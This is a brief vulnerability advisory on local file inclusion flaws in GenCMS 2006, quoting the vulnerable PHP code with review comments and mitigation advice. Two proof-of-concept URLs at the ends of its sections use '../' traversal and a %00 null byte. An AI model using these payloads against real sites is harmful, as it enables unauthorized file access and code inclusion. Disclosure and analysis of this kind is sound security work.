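GenCMS 2006 suffers from local file inclusion vulnerabilities in /show.php and /admin/pages/SiteNew.php: in both files a request parameter is concatenated into a file path without validation.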
f71e732ff7fa723993589579a23facd13213c6afa70bde71cde7b707b469cc51
GenCMS
http://gencms.berlios.de/
eLwaux(c)2009
LFI
/show.php
----------------------------------------------------------------------------------------------------
// Review note: excerpt of /show.php, original file line numbers kept.
// The request parameter 'p' becomes part of a file path in both branches
// below, and no validation of it is visible in this excerpt.
18: $param = $_GET['p'];
// Only an empty value is replaced by the default; '/' and '..' pass through unchanged.
19: if(empty($param)) $param = 'news';
20: //get right page
21: //$page = $param.'.php';
22:
23: //static or dynamic
24: if(GC_FULLSTATIC)
25: {
// Static mode: the caller-supplied name is used as a relative path with '.htm' appended.
26: $page = $param.'.htm';
// staticpage() is not shown; presumably it reads or includes $page -- confirm in the full source.
27: staticpage($page);
28: }
29: else
30: {
// Dynamic mode: the fixed prefix does not confine the path, because $param may contain '../'.
// The appended '.php' only constrains the target on PHP versions that reject NUL bytes in
// paths (5.3.4 and later), and even then any reachable .php file can still be selected.
31: $page = GC_IPATH.'_base/sites/'.$param.'.php';
// dynamicpage() is not shown; the advisory treats it as the inclusion sink.
// Mitigation: resolve 'p' against an allow-list of known page names (or a strict
// pattern such as [A-Za-z0-9_-]+) before building $page.
32: dynamicpage($page);
33: }
----------------------------------------------------------------------------------------------------
PoC: /show.php?p=../../{FILE.PHP}%00
LFI
/admin/pages/SiteNew.php
----------------------------------------------------------------------------------------------------
// Review note: excerpt of /admin/pages/SiteNew.php, original file line numbers kept.
// Original lines 15-22 are not shown, so whether an authentication or input check
// runs before line 23 cannot be determined from this excerpt.
14: if(!empty($_GET['step'])) $Step = $_GET['step'];
// Loose comparison against the string "2" selects the template-configuration step.
23: if ($Step == "2")
24: {
25: // general settings
26: //include blocks from template config
// The POST field 'Template' is concatenated directly into the include path, so '../'
// sequences leave the templates/ directory. The '/config.php' suffix only constrains the
// target on PHP versions that reject NUL bytes in paths (5.3.4 and later).
// Mitigation: accept only names that match an existing directory under templates/
// (allow-list or strict pattern check) before calling include_once.
27: include_once(GC_IPATH.'templates/'.$_POST['Template'].'/config.php');
// $TemplateSettings is not assigned in the excerpt; presumably the included config.php defines it.
28: $TPLBlocks = explode(';',$TemplateSettings);
29: }
----------------------------------------------------------------------------------------------------
PoC: /admin/pages/SiteNew.php?step=2& ( POST: Template=../{FILE.PHP}%00 )